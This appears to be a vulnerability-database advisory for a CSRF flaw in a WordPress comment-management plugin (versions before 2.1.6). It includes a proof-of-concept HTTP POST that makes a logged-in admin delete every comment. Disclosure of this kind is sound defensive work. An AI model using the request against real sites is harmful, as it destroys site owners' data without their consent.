Lucene search

K
wpexploitWpvulndbWPEX-ID:01483284-57F5-4AE9-B5F1-AE26B623571F
HistoryAug 23, 2021 - 12:00 a.m.

Comment Link Remove and Other Comment Tools < 2.1.6 - Arbitrary Comment Deletion via CSRF

2021-08-2300:00:00
wpvulndb
395

0.001 Low

EPSS

Percentile

30.2%

The plugin does not have CSRF check in its ‘Delete comments easily’, which could allow attackers to make logged in admin delete arbitrary comments

POST /wp-admin/admin.php?page=comment-link-remove HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
Connection: keep-alive
Cookie: [admin+ cookies]
Upgrade-Insecure-Requests: 1

delAllCmts=delAllCmts

0.001 Low

EPSS

Percentile

30.2%

Related for WPEX-ID:01483284-57F5-4AE9-B5F1-AE26B623571F